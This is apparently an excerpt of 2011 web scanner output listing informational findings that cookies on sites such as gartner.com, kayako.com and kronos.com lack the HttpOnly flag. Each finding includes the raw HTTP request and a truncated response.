Cache-Control: public, s-maxage=7200, max-age=15724800
X-PvInfo: [S11101.C10821.A151075.RA0.G24F27.UCBD93627].[OT/images.OG/images]
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Mon, 25 Apr 2011 12:11:18 GMT
Age: 6545
Content-Length: 683
Set-Cookie: TS83f541=c4a433b35f9229efc4f43fa5771e388590ef3992c872d9cb4db564e6; Path=/

GIF89af.#.............uuu```jjj..............................UUU.............................................!.......,....f.#.... $.di.h..l..p,.tm.x..|....pH,..HWC.h"..h.pxX.... .B...U..&...!Wh:....kx
...[SNIP]...
17.218. http://www.gartner.com/0_admin/images/documentdisplay/gray_gt_bullet.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /0_admin/images/documentdisplay/gray_gt_bullet.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /0_admin/images/documentdisplay/gray_gt_bullet.gif;pv01523c4179af4095 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Content-type: image/gif
Last-modified: Fri, 25 Feb 2011 23:13:43 GMT
ETag: "pv01523c4179af4095ceb8d97f4e60e435"
Expires: Sat, 15 Oct 2011 01:48:24 GMT
Cache-Control: public, s-maxage=7200, max-age=15724800
X-PvInfo: [S11101.C10821.A151075.RA0.G24F27.UB19576C9].[OT/images.OG/images]
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Mon, 25 Apr 2011 12:11:18 GMT
Age: 2201
Content-Length: 54
Set-Cookie: TS83f541=8153a0f0aebadf3529c552e0069558fe46a150634031125f4db564e6; Path=/

GIF89a    .    ....0Pf...!.......,....    .    .....y....Ts5z.*.;
17.219. http://www.gartner.com/0_admin/images/documentdisplay/research_logo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /0_admin/images/documentdisplay/research_logo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /0_admin/images/documentdisplay/research_logo.gif;pv0f8cc4fa2994f3d2 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Content-type: image/gif
Last-modified: Fri, 25 Feb 2011 23:13:44 GMT
ETag: "pv0f8cc4fa2994f3d2727b91b04e34e9bc"
Expires: Sat, 15 Oct 2011 01:50:09 GMT
Cache-Control: public, s-maxage=7200, max-age=15724800
X-PvInfo: [S11101.C10821.A151075.RA0.G24F27.U7BFAEE3F].[OT/images.OG/images]
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Mon, 25 Apr 2011 12:11:18 GMT
Age: 5032
Content-Length: 620
Set-Cookie: TS83f541=55932c82d7bffac30a01820f4d53983643af129e3519d40b4db564e6; Path=/

GIF89aw.#..........```.........wwwlll.....................UUU!.......,....w.#......I..8....`(.di.h..l..p,.tm.x..|..@..@,..A...k8..g......g`.%<.U...%S..G!,...f
..h4........
.u.H.....u..
...c...3s.N...
...[SNIP]...
17.220. http://www.gartner.com/DisplayDocument  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /DisplayDocument

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /DisplayDocument?doc_cd=127481 HTTP/1.1
Host: www.gartner.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WebLogicSession=cSYnN1vJnb1Nx84rkvK9h3y2Z1JSqHc4Q7GnchMG2ZDySdxm2Pns!475228577; TS83f541=f40dc0e11f368c4df2fa775e78c36fb10621405c7f8621844db56269; WT_FPC=id=173.193.214.243-1722167968.30147392:lv=1303732853510:ss=1303732853510
If-None-Match: "pv33052ebdba339285631c49a7e3f502be"

Response

HTTP/1.1 200 OK
Connection: close
X-Powered-By: Servlet/2.5 JSP/2.1
Content-type: text/html; charset=iso-8859-1
Date: Mon, 25 Apr 2011 12:10:49 GMT
ETag: "pv33052ebdba339285631c49a7e3f502be"
Expires: 0
Cache-Control: must-revalidate, no-cache
Pragma: no-cache
X-PvInfo: [S10202.C10821.A151087.RA0.G24F28.UC3B8E66B].[OT/html.OG/pages]
Vary: Accept-Encoding
Set-Cookie: TS83f541=32d23d3d5a761af07eb8e7078f5d2a8c0621405c7f8621844db564c8; Path=/
Content-Length: 29490

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Improve IT Security With Vulnerability Management</title>
<meta http-equiv=Content-Type content="text/html; ch
...[SNIP]...
17.221. http://www.gartner.com/images/x.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /images/x.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/x.gif;pv0ef9116c348ac829 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Content-type: image/gif
Last-modified: Fri, 25 Feb 2011 23:13:44 GMT
ETag: "pv0ef9116c348ac829060bb55f994d5974"
Expires: Sat, 15 Oct 2011 01:48:24 GMT
Cache-Control: public, s-maxage=7200, max-age=15724800
X-PvInfo: [S11101.C10821.A150953.RA0.G24F27.U9481F6C2].[OT/images.OG/images]
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Mon, 25 Apr 2011 12:11:18 GMT
Age: 6518
Content-Length: 43
Set-Cookie: TS83f541=f398a42a900447acbbf881d8c89365b982b76feb75cf37d54db564e6; Path=/

GIF89a.............!.......,............Q.;
17.222. http://www.gartner.com/js/utility.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /js/utility.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/utility.js;pv1a5d4f2c9f594bc0 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Content-type: application/x-javascript
Last-modified: Fri, 25 Feb 2011 23:13:42 GMT
ETag: "pv1a5d4f2c9f594bc0880fa3d283482a64"
Expires: Sat, 15 Oct 2011 01:45:58 GMT
Cache-Control: public, s-maxage=7200, max-age=15724800
X-PvInfo: [S11101.C10821.A150946.RA0.G24F27.UF4CE7865].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Mon, 25 Apr 2011 12:11:17 GMT
Age: 925
Set-Cookie: TS83f541=6122e271e953b2f4fbd9c22dfd419e57ca690f7bec2de55c4db564e5; Path=/
Content-Length: 29773

// Utility.js - Copyright (c) 2000, 2001, 2002 Gartner Inc. All rights reserved.
// Modified clickBetaSearchLink() method to open BetaSearchLanding.jsp for g.com 6.12
// --Shrileckha Chaithanya


...[SNIP]...
17.223. http://www.gartner.com/js/webtrendsCookies.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /js/webtrendsCookies.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/webtrendsCookies.js;pv072e3556793072f4 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Content-type: application/x-javascript
Last-modified: Fri, 25 Feb 2011 23:13:43 GMT
ETag: "pv072e3556793072f426af3f74ac54883a"
Expires: Sat, 15 Oct 2011 01:45:56 GMT
Cache-Control: public, s-maxage=7200, max-age=15724800
X-PvInfo: [S11101.C10821.A150946.RA0.G24F27.U74878798].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Mon, 25 Apr 2011 12:11:19 GMT
Age: 4918
Set-Cookie: TS83f541=0b6ddca919a34ed950a9046c9610c06d9fb938034b32c76f4db564e7; Path=/
Content-Length: 1124

<!-- START OF SDC Cookie Code -->
<!-- Copyright (c) 1996-2005 WebTrends Inc. All rights reserved. -->
<!-- $DateTime: 2006/03/08 11:31:03 $ -->
var logServer="";
if ((window.location.hostname ==
...[SNIP]...
17.224. http://www.googleadservices.com/pagead/conversion/1069716420/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/conversion/1069716420/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pagead/conversion/1069716420/?random=1303743156487&cv=6&fst=1303743156487&num=1&fmt=3&value=0&label=dwuECKKVsQEQxKeK_gM&bg=666666&hl=en&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=5&u_tz=-300&u_java=true&u_nplug=9&u_nmime=44&url=http%3A//www.eset.com/us/ HTTP/1.1
Host: www.googleadservices.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Conversion=CoQBQ09EekZUV0sxVGJfZ0U0R2cwQUdYN3JSRWtxN3kxZ0dDdWRIcEY2aW4xelFRQlNnSVVPYkkxSkwtX19fX193Rmd5ZTZEaVBDajdCS2dBY1NuaXY0RHlBRUJxZ1FkVDlCM25fb29MRUpqNG1qVURxN2pSSnI5MHJYMUcyRzF1anlTVWI4EhMIvOfSos-3qAIVCX_lCh3hL5EIGAEgm5-68LGAgJTgAUgB

Response

HTTP/1.1 302 Found
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Date: Mon, 25 Apr 2011 15:14:28 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: image/gif
Set-Cookie: Conversion=CoQBQ09EekZUV0sxVGJfZ0U0R2cwQUdYN3JSRWtxN3kxZ0dDdWRIcEY2aW4xelFRQlNnSVVPYkkxSkwtX19fX193Rmd5ZTZEaVBDajdCS2dBY1NuaXY0RHlBRUJxZ1FkVDlCM25fb29MRUpqNG1qVURxN2pSSnI5MHJYMUcyRzF1anlTVWI4EhMIvOfSos-3qAIVCX_lCh3hL5EIGAAglMmkrsK0tcwiSAE; expires=Wed, 25-May-2011 12:00:31 GMT; path=/pagead/conversion/1069716420/
Location: http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1069716420/?random=1303743156487&cv=6&fst=1303743156487&num=1&fmt=3&value=0&label=dwuECKKVsQEQxKeK_gM&bg=666666&hl=en&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=5&u_tz=-300&u_java=true&u_nplug=9&u_nmime=44&url=http%3A//www.eset.com/us/&ctc_id=CAEVAQAAAB0BAAAA&ct_cookie_present=true
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 42
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D.;
17.225. http://www.googleadservices.com/pagead/conversion/1072501689/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/conversion/1072501689/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pagead/conversion/1072501689/?random=1303733542110&cv=6&fst=1303733542110&num=1&fmt=1&value=1&label=pageview&bg=FFFFFF&hl=en&gl=US&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=3&u_tz=-300&u_java=true&u_nplug=9&u_nmime=44&ref=http%3A//www.manageengine.com/products/security-manager/store.html&url=http%3A//www.manageengine.com/products/security-manager/download.html HTTP/1.1
Host: www.googleadservices.com
Proxy-Connection: keep-alive
Referer: http://www.manageengine.com/products/security-manager/download.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Conversion=CoMBQ0NlaVJUV0sxVGJfZ0U0R2cwQUdYN3JSRWtLcXFINWFWb05BT19aMkZXUkFJS0FoUWo1T1c2UF9fX19fX0FXREo3b09JOEtQc0VxQUJ1YWUwX3dQSUFRR3FCQjFQMENmTDFTZ3NRV1BpYU5RT3J1TWttYjNZdGZVYlliVzZQSkpSdncSEwi_vf-kz7eoAhUE3uAKHZUYjgsYASDO0K-h-qz6mWtIAQ

Response

HTTP/1.1 302 Found
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Date: Mon, 25 Apr 2011 12:12:12 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Set-Cookie: Conversion=CoMBQ0NlaVJUV0sxVGJfZ0U0R2cwQUdYN3JSRWtLcXFINWFWb05BT19aMkZXUkFJS0FoUWo1T1c2UF9fX19fX0FXREo3b09JOEtQc0VxQUJ1YWUwX3dQSUFRR3FCQjFQMENmTDFTZ3NRV1BpYU5RT3J1TWttYjNZdGZVYlliVzZQSkpSdncSEwi_vf-kz7eoAhUE3uAKHZUYjgsYACCrq-zczvrRxb0BSAE; expires=Wed, 25-May-2011 12:00:36 GMT; path=/pagead/conversion/1072501689/
Location: http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1072501689/?random=1303733542110&cv=6&fst=1303733542110&num=1&fmt=1&value=1&label=pageview&bg=FFFFFF&hl=en&gl=US&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=3&u_tz=-300&u_java=true&u_nplug=9&u_nmime=44&ref=http%3A//www.manageengine.com/products/security-manager/store.html&url=http%3A//www.manageengine.com/products/security-manager/download.html&ctc_id=CAEVAQAAAB0BAAAA&ct_cookie_present=true
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Content-Length: 378

<html><body bgcolor="#ffffff" link="#000000" alink="#000000" vlink="#000000" leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><center><font style="font-size:11px" face="arial,sans
...[SNIP]...
17.226. http://www.kayako.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kayako.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.kayako.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:40:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.3
Set-Cookie: km__last_visit=988418453; expires=Tue, 24-Apr-2012 19:40:53 GMT; path=/; domain=.kayako.com
Set-Cookie: km__last_activity=1303778453; expires=Tue, 24-Apr-2012 19:40:53 GMT; path=/; domain=.kayako.com
Set-Cookie: km__tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=.kayako.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43334


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>Help Desk Softwa
...[SNIP]...
17.227. http://www.kayako.com/styles/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kayako.com
Path:   /styles/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /styles/ HTTP/1.1
Host: www.kayako.com
Proxy-Connection: keep-alive
Referer: http://www.kayako.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: km__last_visit=988416873; km__last_activity=1303776873; km__tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:14:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.3
Set-Cookie: km__last_activity=1303776873; expires=Tue, 24-Apr-2012 19:14:33 GMT; path=/; domain=.kayako.com
Set-Cookie: km__tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fstyles%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=.kayako.com
Set-Cookie: km__tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=.kayako.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/css
Content-Length: 105618

/* Reset */
html,body,div,span,applet,object,iframe,h1,h2,h3,h4,h5,h6,p, blockquote, pre,a,abbr,acronym,address,big,cite,code,del,dfn,em,font,img,ins,kbd,q,s,samp,small,strike,strong,sub,sup,tt,var,dl
...[SNIP]...
17.228. http://www.kayako.com/styles/graphics/loader.white.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kayako.com
Path:   /styles/graphics/loader.white.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /styles/graphics/loader.white.gif HTTP/1.1
Host: www.kayako.com
Proxy-Connection: keep-alive
Referer: http://www.kayako.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: km__last_visit=988416873; km__last_activity=1303776873; km__tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; __utmz=243534751.1303758892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=243534751.649237146.1303758892.1303758892.1303758892.1; __utmc=243534751; __utmb=243534751.1.10.1303758892

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:15:14 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.3
Set-Cookie: km__last_activity=1303776914; expires=Tue, 24-Apr-2012 19:15:14 GMT; path=/; domain=.kayako.com
Set-Cookie: km__tracker=a%3A0%3A%7B%7D; path=/; domain=.kayako.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/css
Content-Length: 105618

/* Reset */
html,body,div,span,applet,object,iframe,h1,h2,h3,h4,h5,h6,p, blockquote, pre,a,abbr,acronym,address,big,cite,code,del,dfn,em,font,img,ins,kbd,q,s,samp,small,strike,strong,sub,sup,tt,var,dl
...[SNIP]...
17.229. http://www.kronos.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kronos.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.kronos.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 13:33:42 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.kronos.com&SiteLanguage=1033; path=/
Set-Cookie: EktGUID=91eff232-0ee4-4940-9643-e76914405540; expires=Wed, 25-Apr-2012 13:33:41 GMT; path=/
Set-Cookie: EkAnalytics=newuser; expires=Wed, 25-Apr-2012 13:33:41 GMT; path=/
Set-Cookie: KRONOS_PUBLIC_US=WntmyN5z9PTwW3dITu3dPTmlzgHQFsqFwJIqve05HUWIOX9pQUkyTzbW8Sh8AMxsm9G3H0e2qU1RztpCBrjx28ZfWtu9UPonnhB-lqbtv18bPhzsYu4EaTChKkmW_cMtT-iWtxAMfK68X75hYm-6Uuzr9Gjun_AXuk1KYvMoqvvnCwBB0; expires=Mon, 04-Jul-2011 00:13:41 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=by3m1fvhqslzgkurzbbrw5um; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 39469


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="ctl00_html1" xmlns="http://www.w3.org/1999/xhtml" lang="en-US">
...[SNIP]...
17.230. http://www.livejournal.com/tools/endpoints/journalspotlight.bml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livejournal.com
Path:   /tools/endpoints/journalspotlight.bml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tools/endpoints/journalspotlight.bml?skip=1&limit=&show_userpics=1&user=&_rand=0.36380812083370984 HTTP/1.1
Host: www.livejournal.com
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164322722.1303741260.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=164322722.814293328.1303741260.1303741260.1303741260.1; __utmc=164322722; __utmb=164322722.1.10.1303741260

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Date: Mon, 25 Apr 2011 14:35:25 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-AWS-Id: ws15
Set-Cookie: ljuniq=Xw061catQYuvMxT:1303742123:pgstats0:m0; expires=Friday, 24-Jun-2011 14:35:23 GMT; domain=.livejournal.com; path=/
Cache-Control: private, proxy-revalidate
ETag: "768345d85a0645590662a213040f76ec"
Vary: Accept-Encoding
Content-Language: en
X-Varnish: 774812408
Age: 0
Via: 1.1 varnish
Content-Length: 2875

{"text":"<table width='100%'><tr><td valign='top' rowspan='2' style='padding-right: 5px;'>\n<div class='normal-users'>\n<ul class='nostyle pkg'>\n<li class='spotlight-1 with-userpic'><span class='user
...[SNIP]...
17.231. http://www.netsuite.com/pages/portal/page_not_found.jspinternal=T  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netsuite.com
Path:   /pages/portal/page_not_found.jspinternal=T

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/portal/page_not_found.jspinternal=T HTTP/1.1
Host: www.netsuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=session#1303736347554-914602#1303743997|PC#1303736347554-914602.17#1304951737|check#true#1303742197

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 1229
P3P: CP="CAO PSAa OUR BUS PUR"
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 15:13:51 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: NS_VER=2011.1.0; domain=www.netsuite.com; path=/


<!-- -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
...[SNIP]...
17.232. http://www.smpone.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smpone.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?gclid=CLbB86LPt6gCFSIRNAod2E3lCQ HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.1.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243

